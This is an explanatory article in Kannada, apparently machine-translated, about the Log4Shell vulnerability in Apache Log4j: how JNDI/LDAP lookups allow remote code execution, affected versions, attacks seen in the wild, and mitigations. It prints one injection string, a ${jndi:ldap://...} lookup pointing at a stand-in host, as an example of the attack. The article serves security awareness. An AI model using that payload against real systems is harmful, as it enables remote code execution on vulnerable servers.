ಪರಿವಿಡಿ[ಮರೆಮಾಡಿ][ತೋರಿಸಿ]
ನವೆಂಬರ್ 2021 ರ ಕೊನೆಯಲ್ಲಿ, ನಾವು ಸೈಬರ್ ಸುರಕ್ಷತೆಗೆ ದೊಡ್ಡ ಬೆದರಿಕೆಯನ್ನು ಬಹಿರಂಗಪಡಿಸಿದ್ದೇವೆ. ಈ ಶೋಷಣೆಯು ಪ್ರಪಂಚದಾದ್ಯಂತ ಲಕ್ಷಾಂತರ ಕಂಪ್ಯೂಟರ್ ಸಿಸ್ಟಮ್ಗಳ ಮೇಲೆ ಪ್ರಭಾವ ಬೀರಬಹುದು.
ಇದು Log4j ದುರ್ಬಲತೆ ಮತ್ತು ಪ್ರಪಂಚದ ಕಂಪ್ಯೂಟರ್ ಸೇವೆಗಳಲ್ಲಿ 90% ಕ್ಕಿಂತ ಹೆಚ್ಚಿನ ವಿನ್ಯಾಸದ ದೋಷವು ಹೇಗೆ ದಾಳಿಗೆ ತೆರೆದುಕೊಳ್ಳುತ್ತದೆ ಎಂಬುದರ ಕುರಿತು ಮಾರ್ಗದರ್ಶಿಯಾಗಿದೆ.
Apache Log4j ಎಂಬುದು ಅಪಾಚೆ ಸಾಫ್ಟ್ವೇರ್ ಫೌಂಡೇಶನ್ನಿಂದ ಅಭಿವೃದ್ಧಿಪಡಿಸಲಾದ ಮುಕ್ತ-ಮೂಲ ಜಾವಾ-ಆಧಾರಿತ ಲಾಗಿಂಗ್ ಉಪಯುಕ್ತತೆಯಾಗಿದೆ. ಮೂಲತಃ 2001 ರಲ್ಲಿ Ceki Gülcü ಬರೆದಿದ್ದಾರೆ, ಇದು ಈಗ Apache Logging Services ನ ಭಾಗವಾಗಿದೆ, ಇದು Apache Software Foundation ನ ಯೋಜನೆಯಾಗಿದೆ.
ಪ್ರಪಂಚದಾದ್ಯಂತದ ಕಂಪನಿಗಳು ತಮ್ಮ ಅಪ್ಲಿಕೇಶನ್ಗಳಲ್ಲಿ ಲಾಗಿಂಗ್ ಅನ್ನು ಸಕ್ರಿಯಗೊಳಿಸಲು Log4j ಲೈಬ್ರರಿಯನ್ನು ಬಳಸುತ್ತವೆ. ವಾಸ್ತವವಾಗಿ, ಜಾವಾ ಲೈಬ್ರರಿಯು ಸರ್ವತ್ರವಾಗಿದೆ, ನೀವು ಅದನ್ನು Amazon, Microsoft, Google ಮತ್ತು ಹೆಚ್ಚಿನ ಅಪ್ಲಿಕೇಶನ್ಗಳಲ್ಲಿ ಕಾಣಬಹುದು.
ಲೈಬ್ರರಿಯ ಪ್ರಾಮುಖ್ಯತೆ ಎಂದರೆ ಕೋಡ್ನಲ್ಲಿನ ಯಾವುದೇ ಸಂಭಾವ್ಯ ದೋಷವು ಲಕ್ಷಾಂತರ ಕಂಪ್ಯೂಟರ್ಗಳನ್ನು ಹ್ಯಾಕಿಂಗ್ಗೆ ಮುಕ್ತವಾಗಿ ಬಿಡಬಹುದು. ನವೆಂಬರ್ 24, 2021 ರಂದು, ಎ ಮೋಡದ ಸುರಕ್ಷತೆ ಅಲಿಬಾಬಾದಲ್ಲಿ ಕೆಲಸ ಮಾಡುವ ಸಂಶೋಧಕರು ಭಯಾನಕ ನ್ಯೂನತೆಯನ್ನು ಕಂಡುಹಿಡಿದರು.
Log4j ದುರ್ಬಲತೆ, Log4Shell ಎಂದೂ ಕರೆಯಲ್ಪಡುತ್ತದೆ, ಇದು 2013 ರಿಂದ ಗಮನಿಸದೆ ಅಸ್ತಿತ್ವದಲ್ಲಿದೆ. ಈ ದುರ್ಬಲತೆಯು ದುರುದ್ದೇಶಪೂರಿತ ನಟರಿಗೆ Log4j ಚಾಲನೆಯಲ್ಲಿರುವ ಪೀಡಿತ ಸಿಸ್ಟಮ್ಗಳಲ್ಲಿ ಕೋಡ್ ಅನ್ನು ಚಲಾಯಿಸಲು ಅವಕಾಶ ಮಾಡಿಕೊಟ್ಟಿತು. ಇದನ್ನು ಡಿಸೆಂಬರ್ 9, 2021 ರಂದು ಸಾರ್ವಜನಿಕವಾಗಿ ಬಹಿರಂಗಪಡಿಸಲಾಯಿತು
ಉದ್ಯಮದ ತಜ್ಞರು Log4Shell ದೋಷವನ್ನು ಕರೆಯುತ್ತಾರೆ ಇತ್ತೀಚಿನ ಸ್ಮರಣೆಯಲ್ಲಿ ಅತಿದೊಡ್ಡ ದುರ್ಬಲತೆ.
ದುರ್ಬಲತೆಯ ಪ್ರಕಟಣೆಯ ನಂತರದ ವಾರದಲ್ಲಿ, ಸೈಬರ್ಸೆಕ್ಯುರಿಟಿ ತಂಡಗಳು ಲಕ್ಷಾಂತರ ದಾಳಿಗಳನ್ನು ಪತ್ತೆಹಚ್ಚಿದವು. ಕೆಲವು ಸಂಶೋಧಕರು ಪ್ರತಿ ನಿಮಿಷಕ್ಕೆ ನೂರಕ್ಕೂ ಹೆಚ್ಚು ದಾಳಿಗಳ ದರವನ್ನು ಗಮನಿಸಿದ್ದಾರೆ.
ಇದು ಹೇಗೆ ಕೆಲಸ ಮಾಡುತ್ತದೆ?
Log4Shell ಏಕೆ ತುಂಬಾ ಅಪಾಯಕಾರಿ ಎಂಬುದನ್ನು ಅರ್ಥಮಾಡಿಕೊಳ್ಳಲು, ಅದರ ಸಾಮರ್ಥ್ಯವನ್ನು ನಾವು ಅರ್ಥಮಾಡಿಕೊಳ್ಳಬೇಕು.
Log4Shell ದುರ್ಬಲತೆಯು ಅನಿಯಂತ್ರಿತ ಕೋಡ್ ಎಕ್ಸಿಕ್ಯೂಶನ್ಗೆ ಅನುಮತಿಸುತ್ತದೆ, ಇದರರ್ಥ ಆಕ್ರಮಣಕಾರನು ಗುರಿ ಯಂತ್ರದಲ್ಲಿ ಯಾವುದೇ ಆಜ್ಞೆ ಅಥವಾ ಕೋಡ್ ಅನ್ನು ಚಲಾಯಿಸಬಹುದು.
ಇದು ಇದನ್ನು ಹೇಗೆ ಸಾಧಿಸುತ್ತದೆ?
ಮೊದಲಿಗೆ, ಜೆಎನ್ಡಿಐ ಎಂದರೇನು ಎಂಬುದನ್ನು ನಾವು ಅರ್ಥಮಾಡಿಕೊಳ್ಳಬೇಕು.
ಜಾವಾ ನಾಮಕರಣ ಮತ್ತು ಡೈರೆಕ್ಟರಿ ಇಂಟರ್ಫೇಸ್ (ಜೆಎನ್ಡಿಐ) ಎಂಬುದು ಜಾವಾ ಸೇವೆಯಾಗಿದ್ದು ಅದು ಜಾವಾ ಪ್ರೋಗ್ರಾಂಗಳನ್ನು ಹೆಸರಿನ ಮೂಲಕ ಡೇಟಾ ಮತ್ತು ಸಂಪನ್ಮೂಲಗಳನ್ನು ಕಂಡುಹಿಡಿಯಲು ಮತ್ತು ಹುಡುಕಲು ಅನುಮತಿಸುತ್ತದೆ. ಈ ಡೈರೆಕ್ಟರಿ ಸೇವೆಗಳು ಪ್ರಮುಖವಾಗಿವೆ ಏಕೆಂದರೆ ಅವುಗಳು ಅಪ್ಲಿಕೇಶನ್ಗಳನ್ನು ರಚಿಸುವಾಗ ಸುಲಭವಾಗಿ ಉಲ್ಲೇಖಿಸಲು ಡೆವಲಪರ್ಗಳಿಗೆ ಸಂಘಟಿತ ದಾಖಲೆಗಳನ್ನು ಒದಗಿಸುತ್ತವೆ.
ನಿರ್ದಿಷ್ಟ ಡೈರೆಕ್ಟರಿಯನ್ನು ಪ್ರವೇಶಿಸಲು JNDI ವಿವಿಧ ಪ್ರೋಟೋಕಾಲ್ಗಳನ್ನು ಬಳಸಬಹುದು. ಈ ಪ್ರೋಟೋಕಾಲ್ಗಳಲ್ಲಿ ಒಂದು ಲೈಟ್ವೈಟ್ ಡೈರೆಕ್ಟರಿ ಆಕ್ಸೆಸ್ ಪ್ರೋಟೋಕಾಲ್, ಅಥವಾ LDAP.
ಸ್ಟ್ರಿಂಗ್ ಅನ್ನು ಲಾಗ್ ಮಾಡುವಾಗ, ಲಾಗ್4ಜೆ ರೂಪದ ಅಭಿವ್ಯಕ್ತಿಗಳನ್ನು ಎದುರಿಸಿದಾಗ ಸ್ಟ್ರಿಂಗ್ ಪರ್ಯಾಯಗಳನ್ನು ನಿರ್ವಹಿಸುತ್ತದೆ ${prefix:name}
.
ಉದಾಹರಣೆಗೆ, Text: ${java:version}
ಪಠ್ಯದಂತೆ ಲಾಗ್ ಆಗಿರಬಹುದು: ಜಾವಾ ಆವೃತ್ತಿ 1.8.0_65. ಈ ರೀತಿಯ ಪರ್ಯಾಯಗಳು ಸಾಮಾನ್ಯವಾಗಿದೆ.
ನಾವು ಮುಂತಾದ ಅಭಿವ್ಯಕ್ತಿಗಳನ್ನು ಸಹ ಹೊಂದಬಹುದು Text: ${jndi:ldap://example.com/file}
ಇದು LDAP ಪ್ರೋಟೋಕಾಲ್ ಮೂಲಕ URL ನಿಂದ ಜಾವಾ ವಸ್ತುವನ್ನು ಲೋಡ್ ಮಾಡಲು JNDI ವ್ಯವಸ್ಥೆಯನ್ನು ಬಳಸುತ್ತದೆ.
ಇದು ಆ URL ನಿಂದ ಬರುವ ಡೇಟಾವನ್ನು ಯಂತ್ರಕ್ಕೆ ಪರಿಣಾಮಕಾರಿಯಾಗಿ ಲೋಡ್ ಮಾಡುತ್ತದೆ. ಯಾವುದೇ ಸಂಭಾವ್ಯ ಹ್ಯಾಕರ್ ಸಾರ್ವಜನಿಕ URL ನಲ್ಲಿ ದುರುದ್ದೇಶಪೂರಿತ ಕೋಡ್ ಅನ್ನು ಹೋಸ್ಟ್ ಮಾಡಬಹುದು ಮತ್ತು ಅದನ್ನು ಲಾಗ್ ಮಾಡಲು Log4j ಬಳಸುವ ಯಂತ್ರಗಳಿಗಾಗಿ ನಿರೀಕ್ಷಿಸಿ.
ಲಾಗ್ ಸಂದೇಶಗಳ ವಿಷಯಗಳು ಬಳಕೆದಾರ-ನಿಯಂತ್ರಿತ ಡೇಟಾವನ್ನು ಒಳಗೊಂಡಿರುವುದರಿಂದ, ಹ್ಯಾಕರ್ಗಳು ತಮ್ಮದೇ ಆದ JNDI ಉಲ್ಲೇಖಗಳನ್ನು ಸೇರಿಸಬಹುದು ಅದು ಅವರು ನಿಯಂತ್ರಿಸುವ LDAP ಸರ್ವರ್ಗಳನ್ನು ಸೂಚಿಸುತ್ತದೆ. ಈ LDAP ಸರ್ವರ್ಗಳು ದುರುದ್ದೇಶಪೂರಿತ ಜಾವಾ ಆಬ್ಜೆಕ್ಟ್ಗಳಿಂದ ತುಂಬಿರಬಹುದು, ಅದನ್ನು ದುರ್ಬಲತೆಯ ಮೂಲಕ JNDI ಕಾರ್ಯಗತಗೊಳಿಸಬಹುದು.
ಅಪ್ಲಿಕೇಶನ್ ಸರ್ವರ್-ಸೈಡ್ ಅಥವಾ ಕ್ಲೈಂಟ್-ಸೈಡ್ ಅಪ್ಲಿಕೇಶನ್ ಆಗಿದ್ದರೂ ಪರವಾಗಿಲ್ಲ ಎಂಬುದು ಇದನ್ನು ಇನ್ನಷ್ಟು ಹದಗೆಡಿಸುತ್ತದೆ.
ಆಕ್ರಮಣಕಾರರ ದುರುದ್ದೇಶಪೂರಿತ ಕೋಡ್ ಅನ್ನು ಓದಲು ಲಾಗರ್ಗೆ ಒಂದು ಮಾರ್ಗವಿರುವವರೆಗೆ, ಅಪ್ಲಿಕೇಶನ್ ಇನ್ನೂ ಶೋಷಣೆಗೆ ತೆರೆದಿರುತ್ತದೆ.
ಯಾರು ಪರಿಣಾಮ ಬೀರುತ್ತಾರೆ?
ದುರ್ಬಲತೆಯು APache Log4j ಅನ್ನು ಬಳಸುವ ಎಲ್ಲಾ ಸಿಸ್ಟಮ್ಗಳು ಮತ್ತು ಸೇವೆಗಳ ಮೇಲೆ ಪರಿಣಾಮ ಬೀರುತ್ತದೆ, ಆವೃತ್ತಿಗಳು 2.0 ವರೆಗೆ ಮತ್ತು 2.14.1 ಸೇರಿದಂತೆ.
ಜಾವಾವನ್ನು ಬಳಸುವ ಹಲವಾರು ಅಪ್ಲಿಕೇಶನ್ಗಳ ಮೇಲೆ ದುರ್ಬಲತೆ ಪರಿಣಾಮ ಬೀರಬಹುದು ಎಂದು ಹಲವಾರು ಭದ್ರತಾ ತಜ್ಞರು ಸಲಹೆ ನೀಡುತ್ತಾರೆ.
ಮೈಕ್ರೋಸಾಫ್ಟ್ ಮಾಲೀಕತ್ವದ Minecraft ವಿಡಿಯೋ ಗೇಮ್ನಲ್ಲಿ ದೋಷವನ್ನು ಮೊದಲು ಕಂಡುಹಿಡಿಯಲಾಯಿತು. ಯಾವುದೇ ಅಪಾಯವನ್ನು ತಡೆಗಟ್ಟಲು ತಮ್ಮ ಜಾವಾ ಆವೃತ್ತಿಯ Minecraft ಸಾಫ್ಟ್ವೇರ್ ಅನ್ನು ಅಪ್ಗ್ರೇಡ್ ಮಾಡಲು Microsoft ತಮ್ಮ ಬಳಕೆದಾರರನ್ನು ಒತ್ತಾಯಿಸಿದೆ.
ಜೆನ್ ಈಸ್ಟರ್ಲಿ, ಸೈಬರ್ ಸೆಕ್ಯುರಿಟಿ ಮತ್ತು ಇನ್ಫ್ರಾಸ್ಟ್ರಕ್ಚರ್ ಸೆಕ್ಯುರಿಟಿ ಏಜೆನ್ಸಿ (ಸಿಐಎಸ್ಎ) ನಿರ್ದೇಶಕರು ಮಾರಾಟಗಾರರು ಪ್ರಮುಖ ಜವಾಬ್ದಾರಿ ಈ ದುರ್ಬಲತೆಯನ್ನು ಬಳಸಿಕೊಳ್ಳುವ ದುರುದ್ದೇಶಪೂರಿತ ನಟರಿಂದ ಅಂತಿಮ ಬಳಕೆದಾರರನ್ನು ತಡೆಯಲು.
"ತಮ್ಮ ಉತ್ಪನ್ನವು ಈ ದುರ್ಬಲತೆಯನ್ನು ಹೊಂದಿದೆ ಮತ್ತು ಸಾಫ್ಟ್ವೇರ್ ನವೀಕರಣಗಳಿಗೆ ಆದ್ಯತೆ ನೀಡಬೇಕು ಎಂದು ಅಂತಿಮ ಬಳಕೆದಾರರಿಗೆ ತಿಳಿದಿರುವುದನ್ನು ಖಚಿತಪಡಿಸಿಕೊಳ್ಳಲು ಮಾರಾಟಗಾರರು ತಮ್ಮ ಗ್ರಾಹಕರೊಂದಿಗೆ ಸಂವಹನ ನಡೆಸಬೇಕು."
ದಾಳಿಗಳು ಈಗಾಗಲೇ ಪ್ರಾರಂಭವಾಗಿವೆ ಎಂದು ವರದಿಯಾಗಿದೆ. ಸೈಬರ್ ಸೆಕ್ಯುರಿಟಿ ಸಾಫ್ಟ್ವೇರ್ ಅನ್ನು ಒದಗಿಸುವ ಸಿಮ್ಯಾಂಟೆಕ್ ಕಂಪನಿಯು ವಿವಿಧ ಸಂಖ್ಯೆಯ ದಾಳಿ ವಿನಂತಿಗಳನ್ನು ಗಮನಿಸಿದೆ.
ಸಂಶೋಧಕರು ಪತ್ತೆಹಚ್ಚಿದ ದಾಳಿಯ ಪ್ರಕಾರಗಳ ಕೆಲವು ಉದಾಹರಣೆಗಳು ಇಲ್ಲಿವೆ:
- ಬಾಟ್ನೆಟ್ಸ್
ಬಾಟ್ನೆಟ್ಗಳು ಕಂಪ್ಯೂಟರ್ಗಳ ನೆಟ್ವರ್ಕ್ ಆಗಿದ್ದು ಅದು ಒಂದೇ ಆಕ್ರಮಣಕಾರಿ ಪಕ್ಷದ ನಿಯಂತ್ರಣದಲ್ಲಿದೆ. ಅವರು DDoS ದಾಳಿಗಳು, ಡೇಟಾವನ್ನು ಕದಿಯಲು ಮತ್ತು ಇತರ ಹಗರಣಗಳನ್ನು ನಿರ್ವಹಿಸಲು ಸಹಾಯ ಮಾಡುತ್ತಾರೆ. Log4j ಶೋಷಣೆಯಿಂದ ಡೌನ್ಲೋಡ್ ಮಾಡಲಾದ ಶೆಲ್ ಸ್ಕ್ರಿಪ್ಟ್ಗಳಲ್ಲಿ Muhstik ಬಾಟ್ನೆಟ್ ಅನ್ನು ಸಂಶೋಧಕರು ಗಮನಿಸಿದ್ದಾರೆ.
- XMRig ಮೈನರ್ ಟ್ರೋಜನ್
XMRig ಒಂದು ಮುಕ್ತ-ಮೂಲ ಕ್ರಿಪ್ಟೋಕರೆನ್ಸಿ ಮೈನರ್ಸ್ ಆಗಿದ್ದು ಅದು Monero ಟೋಕನ್ ಅನ್ನು ಗಣಿಗಾರಿಕೆ ಮಾಡಲು CPU ಗಳನ್ನು ಬಳಸುತ್ತದೆ. ಸೈಬರ್ ಕ್ರಿಮಿನಲ್ಗಳು ಜನರ ಸಾಧನಗಳಲ್ಲಿ XMRig ಅನ್ನು ಇನ್ಸ್ಟಾಲ್ ಮಾಡಬಹುದು ಆದ್ದರಿಂದ ಅವರು ತಮ್ಮ ಸಂಸ್ಕರಣಾ ಶಕ್ತಿಯನ್ನು ಅವರ ಅರಿವಿಲ್ಲದೆ ಬಳಸಬಹುದು.
- ಖೋನ್ಸಾರಿ Ransomware
Ransomware ವಿನ್ಯಾಸಗೊಳಿಸಿದ ಮಾಲ್ವೇರ್ನ ಒಂದು ರೂಪವನ್ನು ಸೂಚಿಸುತ್ತದೆ ಫೈಲ್ಗಳನ್ನು ಎನ್ಕ್ರಿಪ್ಟ್ ಮಾಡಿ ಕಂಪ್ಯೂಟರ್ನಲ್ಲಿ. ದಾಳಿಕೋರರು ನಂತರ ಎನ್ಕ್ರಿಪ್ಟ್ ಮಾಡಿದ ಫೈಲ್ಗಳಿಗೆ ಪ್ರವೇಶವನ್ನು ನೀಡುವ ಬದಲು ಪಾವತಿಯನ್ನು ಬೇಡಿಕೆಯಿಡಬಹುದು. Log4Shell ದಾಳಿಯಲ್ಲಿ ಸಂಶೋಧಕರು Khonsari ransomware ಅನ್ನು ಕಂಡುಹಿಡಿದಿದ್ದಾರೆ. ಅವರು ವಿಂಡೋಸ್ ಸರ್ವರ್ಗಳನ್ನು ಗುರಿಯಾಗಿಸುತ್ತಾರೆ ಮತ್ತು .NET ಫ್ರೇಮ್ವರ್ಕ್ ಅನ್ನು ಬಳಸುತ್ತಾರೆ.
ಮುಂದಿನ ಏನಾಗುತ್ತದೆ?
Log4J ದುರ್ಬಲತೆಯಿಂದ ಉಂಟಾಗುವ ಅವ್ಯವಸ್ಥೆಯನ್ನು ಸಂಪೂರ್ಣವಾಗಿ ಸರಿಪಡಿಸಲು ತಿಂಗಳುಗಳು ಅಥವಾ ಬಹುಶಃ ವರ್ಷಗಳು ತೆಗೆದುಕೊಳ್ಳಬಹುದು ಎಂದು ತಜ್ಞರು ಊಹಿಸುತ್ತಾರೆ.
ಈ ಪ್ರಕ್ರಿಯೆಯು ಪ್ರತಿ ಪೀಡಿತ ವ್ಯವಸ್ಥೆಯನ್ನು ಪ್ಯಾಚ್ ಮಾಡಿದ ಆವೃತ್ತಿಯೊಂದಿಗೆ ನವೀಕರಿಸುವುದನ್ನು ಒಳಗೊಂಡಿರುತ್ತದೆ. ಈ ಎಲ್ಲಾ ವ್ಯವಸ್ಥೆಗಳನ್ನು ಪ್ಯಾಚ್ ಮಾಡಲಾಗಿದ್ದರೂ ಸಹ, ದಾಳಿಗಾಗಿ ಸರ್ವರ್ಗಳು ತೆರೆದಿರುವ ವಿಂಡೋಗೆ ಹ್ಯಾಕರ್ಗಳು ಈಗಾಗಲೇ ಸೇರಿಸಿರುವ ಸಂಭವನೀಯ ಹಿಂಬಾಗಿಲುಗಳ ಬೆದರಿಕೆ ಇನ್ನೂ ಇದೆ.
ಅನೇಕ ಪರಿಹಾರಗಳು ಮತ್ತು ತಗ್ಗಿಸುವಿಕೆಗಳು ಈ ದೋಷದಿಂದ ಅಪ್ಲಿಕೇಶನ್ಗಳನ್ನು ಬಳಸಿಕೊಳ್ಳುವುದನ್ನು ತಡೆಯಲು ಅಸ್ತಿತ್ವದಲ್ಲಿದೆ. ಹೊಸ Log4j ಆವೃತ್ತಿ 2.15.0-rc1 ಈ ದುರ್ಬಲತೆಯನ್ನು ತಗ್ಗಿಸಲು ವಿವಿಧ ಸೆಟ್ಟಿಂಗ್ಗಳನ್ನು ಬದಲಾಯಿಸಿದೆ.
JNDI ಅನ್ನು ಬಳಸುವ ಎಲ್ಲಾ ವೈಶಿಷ್ಟ್ಯಗಳನ್ನು ಡಿಫಾಲ್ಟ್ ಆಗಿ ನಿಷ್ಕ್ರಿಯಗೊಳಿಸಲಾಗುತ್ತದೆ ಮತ್ತು ರಿಮೋಟ್ ಲುಕಪ್ಗಳನ್ನು ಸಹ ನಿರ್ಬಂಧಿಸಲಾಗಿದೆ. ನಿಮ್ಮ Log4j ಸೆಟಪ್ನಲ್ಲಿ ಲುಕಪ್ ವೈಶಿಷ್ಟ್ಯವನ್ನು ನಿಷ್ಕ್ರಿಯಗೊಳಿಸುವುದರಿಂದ ಸಂಭವನೀಯ ಶೋಷಣೆಗಳ ಅಪಾಯವನ್ನು ಕಡಿಮೆ ಮಾಡಲು ಸಹಾಯ ಮಾಡುತ್ತದೆ.
Log4j ಹೊರಗೆ, ಓಪನ್ ಸೋರ್ಸ್ ಶೋಷಣೆಗಳನ್ನು ತಡೆಯಲು ಇನ್ನೂ ವಿಶಾಲವಾದ ಯೋಜನೆಯ ಅವಶ್ಯಕತೆಯಿದೆ.
ಹಿಂದಿನ ಮೇ ತಿಂಗಳಲ್ಲಿ, ಶ್ವೇತಭವನವು ಬಿಡುಗಡೆ ಮಾಡಿತು ಕಾರ್ಯನಿರ್ವಾಹಕ ಆದೇಶ ಇದು ರಾಷ್ಟ್ರೀಯ ಸೈಬರ್ ಭದ್ರತೆಯನ್ನು ಸುಧಾರಿಸುವ ಗುರಿಯನ್ನು ಹೊಂದಿದೆ. ಇದು ಸಾಫ್ಟ್ವೇರ್ ಬಿಲ್ ಆಫ್ ಮೆಟೀರಿಯಲ್ಸ್ (SBOM) ಗಾಗಿ ನಿಬಂಧನೆಯನ್ನು ಒಳಗೊಂಡಿತ್ತು, ಇದು ಮೂಲಭೂತವಾಗಿ ಔಪಚಾರಿಕ ದಾಖಲೆಯಾಗಿದ್ದು ಅದು ಅಪ್ಲಿಕೇಶನ್ ಅನ್ನು ನಿರ್ಮಿಸಲು ಅಗತ್ಯವಿರುವ ಪ್ರತಿಯೊಂದು ಐಟಂಗಳ ಪಟ್ಟಿಯನ್ನು ಒಳಗೊಂಡಿದೆ.
ಇದು ಮುಂತಾದ ಭಾಗಗಳನ್ನು ಒಳಗೊಂಡಿದೆ ಮುಕ್ತ ಸಂಪನ್ಮೂಲ ಅಭಿವೃದ್ಧಿಗಾಗಿ ಬಳಸಲಾಗುವ ಪ್ಯಾಕೇಜುಗಳು, ಅವಲಂಬನೆಗಳು ಮತ್ತು API ಗಳು. SBOM ಗಳ ಕಲ್ಪನೆಯು ಪಾರದರ್ಶಕತೆಗೆ ಸಹಾಯಕವಾಗಿದ್ದರೂ, ಇದು ನಿಜವಾಗಿಯೂ ಗ್ರಾಹಕರಿಗೆ ಸಹಾಯ ಮಾಡುತ್ತದೆಯೇ?
ಅವಲಂಬನೆಗಳನ್ನು ನವೀಕರಿಸುವುದು ತುಂಬಾ ತೊಂದರೆಯಾಗಿರಬಹುದು. ಪರ್ಯಾಯ ಪ್ಯಾಕೇಜ್ಗಳನ್ನು ಹುಡುಕುವಲ್ಲಿ ಹೆಚ್ಚುವರಿ ಸಮಯವನ್ನು ವ್ಯರ್ಥ ಮಾಡುವ ಅಪಾಯಕ್ಕಿಂತ ಹೆಚ್ಚಾಗಿ ಯಾವುದೇ ದಂಡವನ್ನು ಪಾವತಿಸಲು ಕಂಪನಿಗಳು ಆಯ್ಕೆ ಮಾಡಬಹುದು. ಬಹುಶಃ ಈ SBOM ಗಳು ಅವುಗಳಿದ್ದರೆ ಮಾತ್ರ ಉಪಯುಕ್ತವಾಗುತ್ತವೆ ವ್ಯಾಪ್ತಿ ಮತ್ತಷ್ಟು ಸೀಮಿತವಾಗಿದೆ.
ತೀರ್ಮಾನ
Log4j ಸಮಸ್ಯೆಯು ಸಂಸ್ಥೆಗಳಿಗೆ ಕೇವಲ ತಾಂತ್ರಿಕ ಸಮಸ್ಯೆಗಿಂತ ಹೆಚ್ಚು.
ತಮ್ಮ ಸರ್ವರ್ಗಳು, ಉತ್ಪನ್ನಗಳು ಅಥವಾ ಸೇವೆಗಳು ತಾವು ನಿರ್ವಹಿಸದ ಕೋಡ್ ಅನ್ನು ಅವಲಂಬಿಸಿದಾಗ ಸಂಭವಿಸಬಹುದಾದ ಸಂಭಾವ್ಯ ಅಪಾಯಗಳ ಬಗ್ಗೆ ವ್ಯಾಪಾರ ನಾಯಕರು ತಿಳಿದಿರಬೇಕು.
ಓಪನ್ ಸೋರ್ಸ್ ಮತ್ತು ಥರ್ಡ್ ಪಾರ್ಟಿ ಅಪ್ಲಿಕೇಶನ್ಗಳ ಮೇಲೆ ಅವಲಂಬಿತವಾಗುವುದು ಯಾವಾಗಲೂ ಸ್ವಲ್ಪ ಪ್ರಮಾಣದ ಅಪಾಯದೊಂದಿಗೆ ಬರುತ್ತದೆ. ಹೊಸ ಬೆದರಿಕೆಗಳು ಬೆಳಕಿಗೆ ಬರುವ ಮೊದಲು ಕಂಪನಿಗಳು ಅಪಾಯ ತಗ್ಗಿಸುವ ಕಾರ್ಯತಂತ್ರಗಳನ್ನು ಪರಿಗಣಿಸಬೇಕು.
ಪ್ರಪಂಚದಾದ್ಯಂತ ಸಾವಿರಾರು ಸ್ವಯಂಸೇವಕರು ನಿರ್ವಹಿಸುವ ಓಪನ್ ಸೋರ್ಸ್ ಸಾಫ್ಟ್ವೇರ್ ಅನ್ನು ವೆಬ್ನ ಬಹುಪಾಲು ಅವಲಂಬಿಸಿದೆ.
ನಾವು ವೆಬ್ ಅನ್ನು ಸುರಕ್ಷಿತ ಸ್ಥಳವಾಗಿ ಇರಿಸಿಕೊಳ್ಳಲು ಬಯಸಿದರೆ, ಸರ್ಕಾರಗಳು ಮತ್ತು ನಿಗಮಗಳು ಮುಕ್ತ ಮೂಲ ಪ್ರಯತ್ನಗಳು ಮತ್ತು ಸೈಬರ್ ಸೆಕ್ಯುರಿಟಿ ಏಜೆನ್ಸಿಗಳಿಗೆ ಹಣ ಹೂಡಬೇಕು ಸಿಐಎಸ್ಎ.
ಪ್ರತ್ಯುತ್ತರ ನೀಡಿ